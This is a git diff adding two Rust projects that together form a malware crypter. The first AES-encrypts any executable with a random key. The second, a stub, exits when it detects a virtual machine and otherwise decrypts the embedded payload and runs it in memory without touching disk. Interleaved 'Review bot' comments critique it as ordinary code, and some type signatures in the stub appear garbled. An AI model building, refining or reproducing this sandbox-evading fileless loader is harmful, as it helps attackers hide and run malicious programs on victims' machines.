diff --git a/crypt/Cargo.lock b/crypt/Cargo.lock
new file mode 100644
index 0000000..0be2db5
--- /dev/null
+++ b/crypt/Cargo.lock
@@ -0,0 +1,183 @@ +# This file is automatically @generated by Cargo. +# It is not intended for manual editing. +version = 3 + +[[package]] +name = "aes" +version = "0.8.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "433cfd6710c9986c576a25ca913c39d66a6474107b406f34f91d4a8923395241" +dependencies = [ + "cfg-if", + "cipher 0.4.4", + "cpufeatures", +] + +[[package]] +name = "block-modes" +version = "0.7.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "57a0e8073e8baa88212fb5823574c02ebccb395136ba9a164ab89379ec6072f0" +dependencies = [ + "block-padding", + "cipher 0.2.5", +] + +[[package]] +name = "block-padding" +version = "0.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8d696c370c750c948ada61c69a0ee2cbbb9c50b1019ddb86d9317157a99c2cae" + +[[package]] +name = "cfg-if" +version = "1.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" + +[[package]] +name = "cipher" +version = "0.2.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "12f8e7987cbd042a63249497f41aed09f8e65add917ea6566effbc56578d6801" +dependencies = [ + "generic-array", +] + +[[package]] +name = "cipher" +version = "0.4.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "773f3b9af64447d2ce9850330c473515014aa235e6a783b02db81ff39e4a3dad" +dependencies = [ + "crypto-common", + "inout", +] + +[[package]] +name = "cpufeatures" +version = "0.2.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3e4c1eaa2012c47becbbad2ab175484c2a84d1185b566fb2cc5b8707343dfe58" +dependencies = [ + "libc", +] + +[[package]] +name = "crypt" +version = "0.1.0" +dependencies = [ + "aes", + "block-modes", + "crypto", + "rand", +] + +[[package]] +name = "crypto" +version = "0.4.0" +source = "registry+https://github.com/rust-lang/crates.io-index" 
+checksum = "17d88231face754cdb045c1b65912a0f4ff78ca24bf371e30a4a8cfa993b3897" +dependencies = [ + "crypto-common", +] + +[[package]] +name = "crypto-common" +version = "0.1.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1bfb12502f3fc46cca1bb51ac28df9d618d813cdc3d2f25b9fe775a34af26bb3" +dependencies = [ + "generic-array", + "typenum", +] + +[[package]] +name = "generic-array" +version = "0.14.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "85649ca51fd72272d7821adaf274ad91c288277713d9c18820d8499a7ff69e9a" +dependencies = [ + "typenum", + "version_check", +] + +[[package]] +name = "getrandom" +version = "0.2.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c85e1d9ab2eadba7e5040d4e09cbd6d072b76a557ad64e797c2cb9d4da21d7e4" +dependencies = [ + "cfg-if", + "libc", + "wasi", +] + +[[package]] +name = "inout" +version = "0.1.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a0c10553d664a4d0bcff9f4215d0aac67a639cc68ef660840afe309b807bc9f5" +dependencies = [ + "generic-array", +] + +[[package]] +name = "libc" +version = "0.2.144" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2b00cc1c228a6782d0f076e7b232802e0c5689d41bb5df366f2a6b6621cfdfe1" + +[[package]] +name = "ppv-lite86" +version = "0.2.17" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5b40af805b3121feab8a3c29f04d8ad262fa8e0561883e7653e024ae4479e6de" + +[[package]] +name = "rand" +version = "0.8.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404" +dependencies = [ + "libc", + "rand_chacha", + "rand_core", +] + +[[package]] +name = "rand_chacha" +version = "0.3.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88" +dependencies = [ + 
"ppv-lite86", + "rand_core", +] + +[[package]] +name = "rand_core" +version = "0.6.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c" +dependencies = [ + "getrandom", +] + +[[package]] +name = "typenum" +version = "1.16.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "497961ef93d974e23eb6f433eb5fe1b7930b659f06d12dec6fc44a8f554c0bba" + +[[package]] +name = "version_check" +version = "0.9.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "49874b5167b65d7193b8aba1567f5c7d93d001cafc34600cee003eda787e483f" + +[[package]] +name = "wasi" +version = "0.11.0+wasi-snapshot-preview1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9c8d87e72b64a3b4db28d11ce29237c246188f4f51057d65a7eab63b7987e423" diff --git a/crypt/Cargo.toml b/crypt/Cargo.toml new file mode 100644 index 0000000..c9df01d --- /dev/null +++ b/crypt/Cargo.toml @@ -0,0 +1,12 @@ +[package] +name = "crypt" +version = "0.1.0" +edition = "2021" + +# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html + +[dependencies] +block-modes = "0.7.0" +rand = "0.8.4" +aes = "0.8.2" +crypto = "0.4.0" diff --git a/crypt/src/main.rs b/crypt/src/main.rs new file mode 100644 index 0000000..74db37d --- /dev/null +++ b/crypt/src/main.rs 
@@ -0,0 +1,46 @@
+use aes::Aes128;
+use aes::cipher::{
+ BlockEncrypt, KeyInit,
+ generic_array::GenericArray,
+};
+use std::fs::read;
+use std::fs::File;
+use std::io::prelude::*;
+use rand::rngs::StdRng;
+use rand::{RngCore, SeedableRng};
+
+fn main() -> std::io::Result<()> {
+ // Read input file into a vector RENAME example.exe to what you want and put it in this "crypt" folder
+ let plaintext_bytes = read("example.exe").expect("Failed to read file");
+
+ let mut encrypted_file = File::create("encrypted_Input.bin")?;
+ let mut key_file = File::create("key.txt")?;
+
+ // Define block size, in this case AES-128
+ let block_size = 16;
+
+ // Pad the bytes
+ let padding_size = block_size - (plaintext_bytes.len() % block_size);
+ let mut padded_plaintext_bytes = plaintext_bytes.clone();
+ padded_plaintext_bytes.extend(vec![padding_size as u8; padding_size]);
+
+ // Gen cipher with a key using nonce token
+ let mut nonce = [0u8; 16];
+ let mut rng = StdRng::from_entropy();
+ rng.fill_bytes(&mut nonce);
+ let key = GenericArray::from_slice(&nonce);
+
+ let cipher = Aes128::new(&key);
+
+ // Encrypt the bytes in blocks
+ let mut enc_bytes = Vec::new();
+ for block in padded_plaintext_bytes.chunks(block_size) {
+ let mut block_array = GenericArray::clone_from_slice(block);
+ cipher.encrypt_block(&mut block_array);
+ enc_bytes.extend_from_slice(&block_array);
+ }
+
+ encrypted_file.write_all(&enc_bytes)?;
+ key_file.write_all(&key)?;
+ Ok(())
+}
\ No newline at end of file
diff --git a/stub/Cargo.lock b/stub/Cargo.lock
new file mode 100644
index 0000000..ceaeab3
--- /dev/null
+++ b/stub/Cargo.lock
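Review bot: In crypt/src/main.rs the loop over `padded_plaintext_bytes.chunks(block_size)` encrypts each 16-byte block independently (ECB, no IV, no integrity tag) and the key is written unprotected to `key.txt` next to `encrypted_Input.bin`, so the output is obfuscated rather than confidential, and the comments do not say so. I would replace `// Gen cipher with a key using nonce token` with `// Random AES-128 key from the OS RNG; written in clear to key.txt, so anyone holding both files recovers the input`, and rename `nonce` to `key_bytes`, since the buffer is a key and not a nonce. `read("example.exe").expect("Failed to read file")` panics inside a function that returns `std::io::Result<()>`; `read("example.exe")?` would match the other calls, and `plaintext_bytes.clone()` is a needless full copy of the input. `block-modes` and `crypto` are declared in crypt/Cargo.toml but never imported in this file; removing them appears to drop the second `cipher` version and `block-padding` from the lockfile and shrinks the dependency set that has to be audited.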
@@ -0,0 +1,107 @@ +# This file is automatically @generated by Cargo. +# It is not intended for manual editing. +version = 3 + +[[package]] +name = "aes" +version = "0.8.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "433cfd6710c9986c576a25ca913c39d66a6474107b406f34f91d4a8923395241" +dependencies = [ + "cfg-if", + "cipher", + "cpufeatures", +] + +[[package]] +name = "cfg-if" +version = "1.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" + +[[package]] +name = "cipher" +version = "0.4.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "773f3b9af64447d2ce9850330c473515014aa235e6a783b02db81ff39e4a3dad" +dependencies = [ + "crypto-common", + "inout", +] + +[[package]] +name = "cpufeatures" +version = "0.2.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3e4c1eaa2012c47becbbad2ab175484c2a84d1185b566fb2cc5b8707343dfe58" +dependencies = [ + "libc", +] + +[[package]] +name = "crypto-common" +version = "0.1.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1bfb12502f3fc46cca1bb51ac28df9d618d813cdc3d2f25b9fe775a34af26bb3" +dependencies = [ + "generic-array", + "typenum", +] + +[[package]] +name = "generic-array" +version = "0.14.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "85649ca51fd72272d7821adaf274ad91c288277713d9c18820d8499a7ff69e9a" +dependencies = [ + "typenum", + "version_check", +] + +[[package]] +name = "inout" +version = "0.1.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a0c10553d664a4d0bcff9f4215d0aac67a639cc68ef660840afe309b807bc9f5" +dependencies = [ + "generic-array", +] + +[[package]] +name = "inside-vm" +version = "0.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 
"3518e289386082220db48c380f414722e25263af4160f8577c247dae0c6f3829" + +[[package]] +name = "libc" +version = "0.2.144" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2b00cc1c228a6782d0f076e7b232802e0c5689d41bb5df366f2a6b6621cfdfe1" + +[[package]] +name = "memexec" +version = "0.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bc62ccb14881da5d1862cda3a9648fb4a4897b2aff0b2557b89da44a5e550b7c" + +[[package]] +name = "stub" +version = "0.1.0" +dependencies = [ + "aes", + "inside-vm", + "memexec", +] + +[[package]] +name = "typenum" +version = "1.16.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "497961ef93d974e23eb6f433eb5fe1b7930b659f06d12dec6fc44a8f554c0bba" + +[[package]] +name = "version_check" +version = "0.9.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "49874b5167b65d7193b8aba1567f5c7d93d001cafc34600cee003eda787e483f" diff --git a/stub/Cargo.toml b/stub/Cargo.toml new file mode 100644 index 0000000..0800fd5 --- /dev/null +++ b/stub/Cargo.toml @@ -0,0 +1,11 @@ +[package] +name = "stub" +version = "0.1.0" +edition = "2021" + +# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html + +[dependencies] +inside-vm = "0.2.0" +aes = "0.8.2" +memexec = "0.2" \ No newline at end of file diff --git a/stub/src/main.rs b/stub/src/main.rs new file mode 100644 index 0000000..6ae5b90 --- /dev/null +++ b/stub/src/main.rs 
@@ -0,0 +1,52 @@
+use aes::Aes128;
+use aes::cipher::{BlockDecrypt, KeyInit,
+ generic_array::GenericArray,
+};
+use inside_vm::inside_vm;
+use std::io::{Read, Cursor};
+use std::io::Result;
+
+
+fn main(){
+ if inside_vm(){
+ println!("This is in a vm");
+ std::process::exit(0);
+ } else {
+ println!("NO VM");
+ let pe_bytes = decrypt_file().unwrap();
+ fileless(pe_bytes);
+ }
+}
+
+fn decrypt_file() -> Result> {
+ // Read encrypted bytes and store bytes of key :3
+ let encrypted_bytes = include_bytes!("encrypted_Input.bin");
+ let mut key_bytes: [u8; 16] = [0; 16];
+ let mut key_file = Cursor::new(include_bytes!("key.txt"));
+ key_file.read_exact(&mut key_bytes)?;
+
+ // Gen cipher with the key B-)
+ let key = GenericArray::from(key_bytes);
+ let cipher = Aes128::new(&key);
+
+ // Decrypt the encrypted bytes in blocks
+ let mut decrypted_bytes = Vec::new();
+ for block in encrypted_bytes.chunks(16) {
+ let mut block_array = GenericArray::clone_from_slice(block);
+ cipher.decrypt_block(&mut block_array);
+ decrypted_bytes.extend_from_slice(&block_array);
+ }
+
+ // Unpad the decrypted bytes
+ let padding_size = decrypted_bytes.last().unwrap().clone() as usize;
+ let decrypted_bytes = (&decrypted_bytes[..decrypted_bytes.len() - padding_size]).to_vec();
+
+ // return decrypted bytes
+ Ok(decrypted_bytes, )
+}
+
+fn fileless(bytes: Vec){
+ unsafe {
+ memexec::memexec_exe(&bytes).unwrap();
+ }
+}
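Review bot: The `unsafe` block in `fileless` has no `// SAFETY:` comment, and nothing in stub/src/main.rs documents what the binary does. As written, `main` exits when `inside_vm()` returns true and otherwise decrypts the embedded `encrypted_Input.bin` with the key embedded from `key.txt` and passes the result to `memexec::memexec_exe`. A module-level `//!` comment should state that flow and two consequences for anyone reviewing or analysing the build: behaviour differs under a hypervisor, so a sandbox run shows only the early exit, and the key ships inside the same binary as the ciphertext, so the payload is recoverable statically. The unpadding step trusts the last decrypted byte: `decrypted_bytes.last().unwrap()` panics on empty input and the slice `[..decrypted_bytes.len() - padding_size]` panics when that byte exceeds the length, so a check like `if padding_size == 0 || padding_size > 16 || padding_size > decrypted_bytes.len() { return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "bad padding")); }` belongs before the slice. The signatures as shown (`Result>` and `Vec)`) look as if their type parameters were lost in rendering and should be checked against the real file.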